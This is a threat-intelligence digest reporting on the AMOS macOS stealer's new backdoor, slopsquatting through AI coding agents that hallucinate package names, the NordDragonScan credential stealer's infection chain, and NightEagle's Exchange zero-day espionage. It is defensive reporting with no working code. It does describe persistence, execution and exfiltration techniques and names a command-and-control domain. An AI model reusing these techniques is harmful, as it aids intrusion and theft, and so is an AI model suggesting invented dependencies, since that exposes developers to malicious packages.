Update: Atomic macOS Stealer Expands Capabilities With Persistent Backdoor, Escalating Threat to macOS Ecosystems
Earlier this year, we reported on Russian-speaking threat actors using platforms like GitHub and FileZilla to distribute the Atomic macOS Stealer (AMOS), targeting macOS users through fake versions of legitimate software. Back then, AMOS was primarily focused on stealing cryptocurrency wallets, browser data, and login credentials. The latest findings show a clear evolution in the threat: AMOS has now integrated a persistent backdoor, transforming it from a single-use infostealer into a full-fledged remote access tool. This new variant allows attackers to maintain long-term access, execute remote commands, and survive system reboots, drastically increasing the risk profile for macOS users. The malware is spread through cracked software downloads and spear-phishing campaigns, often disguised as legitimate processes to bypass user suspicion and system defenses. Once installed, it bypasses macOS Gatekeeper protections by utilizing a combination of Mach-O binaries, AppleScript, and bash scripts to deeply embed itself within the system. The updated AMOS establishes persistence through hidden LaunchDaemon PLIST files, launching as a disguised “[.]helper” process supported by an “[.]agent” script. It connects to command-and-control servers to receive tasks, exfiltrate data, and issue remote shell commands, with keylogging capabilities reportedly in development. The malware’s infrastructure spans over 120 countries, targeting individuals and companies in the U.S., France, and the U.K. While the original campaigns were linked to financially motivated Russian threat actors, it is unclear if this latest version is the work of the same group or if other actors have adopted and evolved the code. What is clear is that AMOS has evolved beyond basic data theft, posing a significantly broader threat to macOS users, including those in tech, AI, and cloud environments, where Mac devices are commonly used for research and system administration. This escalation underscores the necessity for ongoing monitoring and proactive defense strategies against malware-as-a-service threats targeting the macOS ecosystem.
Update: Slopsquatting Evolves: AI Coding Agents Now Deliver Malware Through Hallucinated Package Names
Slopsquatting, a threat we reported several times in the past months, continues to evolve as attackers adapt their delivery techniques. Previously, we explained how AI models can hallucinate fake package names, allowing threat actors to pre-register these names on public repositories such as PyPI and npm. The latest campaigns, however, take this concept further by exploiting AI-powered coding agents—Claude Code CLI, OpenAI Codex CLI, and Cursor AI—that now suggest these hallucinated packages directly in developer workflows. These agents, designed to speed up coding, sometimes fabricate legitimate-looking but entirely fake package names, which attackers quickly publish and weaponize. Developers, relying on AI suggestions during fast-paced tasks, install these packages without realizing the risk, turning their trusted tools into a new infection pathway. Research shows that even with live validation systems in place, these agents occasionally miss edge cases, making slopsquatting an ongoing and dangerous software supply chain risk. This shift from passive package name exploitation to active abuse of coding assistants reflects how attackers are adapting their tactics as AI tools become increasingly popular. In our earlier reporting, we documented the underlying hallucination flaw in language models and how attackers could capitalize on predictable, recurring phantom package names. The latest findings highlight that while the core threat remains the same, the attack surface has expanded through AI-driven workflows where developers often skip manual verification. Defending against this threat requires strict dependency verification, isolated install environments, signed SBOMs, and human approvals for unfamiliar packages. Developers and organizations must recognize that AI tools, while powerful, are still fallible and can introduce serious risks when integrated directly into coding and CI/CD pipelines. As attackers refine their techniques, vigilance throughout the software development lifecycle is crucial to mitigating this supply chain threat.
NordDragonScan Malware Campaign Steals Windows Credentials Through Stealthy Infection Chain
FortiGuard Labs has uncovered an active malware campaign deploying NordDragonScan, an advanced infostealer designed to harvest sensitive data from Windows systems through a stealthy, multi-stage attack chain. The infection process begins when victims click on shortened URLs in phishing emails, often crafted to appear trustworthy, that redirect them to a malicious file-sharing site. From there, victims unknowingly download a RAR archive named with a Ukrainian-themed filename to build credibility and evade suspicion. This archive contains a malicious LNK shortcut, which, when launched, quietly initiates mshta[.]exe to execute a weaponized HTA script hosted on the attacker’s server. This script not only runs PowerShell code from a deceptive file path but also drops the core payload, adblocker[.]exe, into the system’s temporary directory while displaying a harmless decoy document to divert the user’s attention. NordDragonScan establishes a hidden working directory in the local app data folder, where it stages stolen data and configures itself for persistence. The malware employs advanced obfuscation techniques—including XOR-based string encryption and byte-swapping of sensitive code structures—to significantly complicate static analysis and detection by security tools. Once installed, NordDragonScan begins collecting a wide range of data, including login credentials from Chrome and Firefox profiles, documents from key folders, and screenshots captured as “SPicture[.]png.” It communicates with a remote command-and-control server (kpuszkiev.com) using custom HTTP headers, transmitting the stolen data alongside system identifiers, including the victim’s MAC address. To maintain persistence, NordDragonScan creates a registry key (NordStar) under the CurrentVersion\Run path, ensuring the malware re-launches after every reboot. Additionally, the malware performs local network reconnaissance using WMI and [.]NET calls to map nearby devices, gathering hostnames, IP ranges, and system configurations. This level of detail suggests the attackers are preparing for broader lateral movement or follow-on exploitation. Overall, NordDragonScan reflects a well-structured cybercrime operation combining social engineering, fileless execution, persistence techniques, and stealthy exfiltration, posing a serious risk to both individual users and enterprise environments.
NightEagle APT Targets Exchange Zero-Day to Breach AI, Quantum Tech, and Semiconductor Sectors
Cybersecurity researchers have identified a previously unknown threat actor, NightEagle (APT-Q-95), actively exploiting a zero-day vulnerability in Microsoft Exchange servers to conduct targeted espionage. The group has been operational since 2023 but surfaced publicly in July 2025 during a cybersecurity conference, where researchers outlined its activity against the government, defense, semiconductor, artificial intelligence, and quantum technology sectors. NightEagle employs a multi-stage attack chain, beginning with a customized .[N]ET loader planted inside the Exchange server’s IIS process. This loader deploys a modified version of Chisel, an open-source tunneling tool, allowing attackers to establish persistent internal network access. Chisel was hard-coded with authentication details and executed regularly via scheduled tasks, providing attackers with reliable outbound connections back to their command-and-control servers. The key flaw lies in the attackers’ ability to extract the machine key from Exchange, which allowed them to exploit a deserialization flaw and gain full control of the server, thereby accessing mailboxes and deploying additional malware. Investigators believe NightEagle’s operations are highly structured and well-resourced, consistent with an advanced persistent threat. Their infrastructure rotates frequently to avoid detection, and attack times—occurring overnight in China—suggest a Western-based origin, though attribution remains unconfirmed. The group’s focus on the AI and semiconductor industries indicates an intent to steal sensitive intellectual property, providing them with potential insight into emerging technologies critical to both commercial and defense sectors. The zero-day vulnerability itself has not yet been publicly assigned a CVE, leaving many Exchange servers potentially exposed until Microsoft releases a patch. The discovery of NightEagle underscores the ongoing exploitation of enterprise email servers as high-value entry points into sensitive environments, particularly in industries where scientific data, cutting-edge research, and technical communications are prime targets for cyber espionage.
